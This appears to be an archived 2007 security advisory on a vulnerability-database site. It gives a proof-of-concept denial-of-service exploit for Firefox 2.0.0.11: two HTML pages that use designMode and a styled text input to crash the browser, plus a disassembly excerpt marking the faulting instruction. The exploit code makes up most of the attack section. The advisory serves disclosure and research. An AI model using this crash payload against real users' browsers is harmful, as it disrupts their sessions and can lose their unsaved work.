Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18579
HistoryDec 06, 2007 - 12:00 a.m.

Firefox 2.0.0.11 INPUT Denial Of Service

2007-12-0600:00:00
vulners.com
12
JSON

Author: Azizov Emin ([email protected])
ITDEFENCE.ru

Denial of Service at INPUT tag processing
(designMode = on)

POC:

<html>
<head>
<title>!</title>
<script type='text/javascript'>

    function wnd_open&#40;uri,size&#41; {
            pwin=window.open&#40;uri,&#39;&#39;,&#39;menubar=no,scrollbars=yes,location=no,&#39;+size&#41;;
            pwin.document.body.contentEditable=&#39;true&#39;;
            pwin.document.designMode=&#39;on&#39;;
            if&#40;window.focus&#41;{pwin.focus&#40;&#41;};
    }

    &lt;/script&gt;

</head>
<body>
<input type='button' name='sb' value='start'
onclick='wnd_open("/evl.html","width=550,height=350");'>
</body>
</html>

<!–

005EC769 |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
005EC76B |. 6A 00 PUSH 0
005EC76D |. 53 PUSH EBX
005EC76E |. 56 PUSH ESI
005EC76F |. FF50 30 CALL DWORD PTR DS:[EAX+30]
005EC772 |> 8B5B 14 MOV EBX,DWORD PTR DS:[EBX+14]
005EC775 |. 5E POP ESI
005EC776 |. EB 12 JMP SHORT firefox.005EC78A
005EC778 |> 837B 18 00 /CMP DWORD PTR DS:[EBX+18],0
005EC77C |. 75 09 |JNZ SHORT firefox.005EC787
005EC77E |. FF75 10 |PUSH DWORD PTR SS:[EBP+10]
005EC781 |. 8B03 |MOV EAX,DWORD PTR DS:[EBX]
005EC783 |. 53 |PUSH EBX
005EC784 |. FF50 28 |CALL DWORD PTR DS:[EAX+28]
005EC787 |> 8B5B 10 |MOV EBX,DWORD PTR DS:[EBX+10]
005EC78A |> 85DB TEST EBX,EBX
005EC78C |.^75 EA \JNZ SHORT firefox.005EC778
005EC78E |> 5F POP EDI
005EC78F |. 33C0 XOR EAX,EAX
005EC791 |. 5B POP EBX
005EC792 |. C9 LEAVE
005EC793 \. C2 0C00 RETN 0C
005EC796 /$ 56 PUSH ESI
005EC797 |. 8B7424 08 MOV ESI,DWORD PTR SS:[ESP+8]
005EC79B |. 57 PUSH EDI
005EC79C |. 8BF9 MOV EDI,ECX
005EC79E |. 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C] <-------//BREAK
005EC7A1 |. 85C0 TEST EAX,EAX
005EC7A3 |. 74 09 JE SHORT firefox.005EC7AE
005EC7A5 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
005EC7A7 |. 50 PUSH EAX
005EC7A8 |. FF91 C0000000 CALL DWORD PTR DS:[ECX+C0]
005EC7AE |> 8B76 14 MOV ESI,DWORD PTR DS:[ESI+14]
005EC7B1 |. EB 0B JMP SHORT firefox.005EC7BE
005EC7B3 |> 56 /PUSH ESI
005EC7B4 |. 8BCF |MOV ECX,EDI
005EC7B6 |. E8 DBFFFFFF |CALL firefox.005EC796
005EC7BB |. 8B76 10 |MOV ESI,DWORD PTR DS:[ESI+10]
005EC7BE |> 85F6 TEST ESI,ESI
005EC7C0 |.^75 F1 \JNZ SHORT firefox.005EC7B3
005EC7C2 |. 5F POP EDI
005EC7C3 |. 5E POP ESI
005EC7C4 \. C2 0400 RETN 4
–>
<html>
<head>
<title>die</title>
<style type='text/css'>
.textbox
{
padding: 2px 3px;
}
</style>
</head>
<body>
<!–
insert into textbox insert into clipboard … text
to crash …
–>
<input name="m_0" value="" class="textbox" size="3" id='boo' type="text">
</body>
</html>

JSON